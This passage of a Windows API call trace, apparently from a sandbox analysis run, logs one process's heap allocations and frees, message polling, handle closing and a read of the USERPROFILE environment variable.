(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0200.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0200.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0200.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0200.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0200.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0200.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0200.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0200.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0200.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0200.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0200.025] FreeLibrary (hLibModule=0x74d40000) returned 1 [0200.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0200.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0200.025] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0200.025] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0200.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0200.026] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0200.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0200.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0200.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0200.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0200.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0200.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0200.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0200.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0200.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0200.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0200.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0200.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0200.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0200.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0200.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0200.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9db0 [0200.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f48 [0200.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d98 [0200.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0200.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9eb8 [0200.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0200.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0200.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d20 [0200.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0200.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0200.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0200.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0200.027] CloseHandle (hObject=0x1f8) returned 1 [0200.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0200.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0200.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0200.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0200.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0200.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0200.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0200.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0200.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0200.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0200.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0200.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0200.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0200.030] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0200.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0200.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0200.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0200.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0200.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0200.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0200.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0200.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0200.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0200.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0200.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0200.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0200.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0200.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0200.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0200.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9eb8 [0200.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d98 [0200.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa080 [0200.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0200.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9db0 [0200.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0200.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0200.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d20 [0200.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0200.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0200.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0200.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.031] CloseHandle (hObject=0x268) returned 1 [0200.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0200.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0200.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0200.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0200.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0200.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0200.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0200.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0200.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0200.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0200.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0200.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0200.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0200.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0200.047] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0200.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0200.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0200.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0200.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0200.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0200.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0200.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0200.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0200.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0200.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0200.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0200.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0200.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0200.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0200.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0200.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0200.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0200.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0200.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0200.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0200.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0200.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0200.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0200.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0200.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0200.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0200.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0200.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0200.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0200.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0200.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0200.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0200.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0200.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0200.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0200.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0200.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0200.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0200.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0200.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0200.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0200.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0200.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0200.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0200.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0200.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0200.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0200.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0200.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0200.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0200.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0200.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0200.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0200.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0200.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0200.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0200.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0200.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0200.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0200.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0200.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2048 | out: hHeap=0x25c0000) returned 1 [0200.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0200.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0200.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0200.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0200.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0200.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0200.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0200.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0200.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0200.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0200.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0200.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0200.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0200.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0200.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0200.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0200.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0200.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0200.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0200.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3020 | out: hHeap=0x25c0000) returned 1 [0200.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0200.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0200.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0200.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0200.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0200.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0200.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0200.061] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0200.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0200.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0200.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0200.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0200.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0200.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0200.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0200.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0200.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0200.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0200.062] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0200.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0200.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0200.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1d0 [0200.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0200.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0200.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0e0 [0200.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0200.064] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0200.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0200.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0200.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0200.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0200.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0200.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0200.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0200.064] 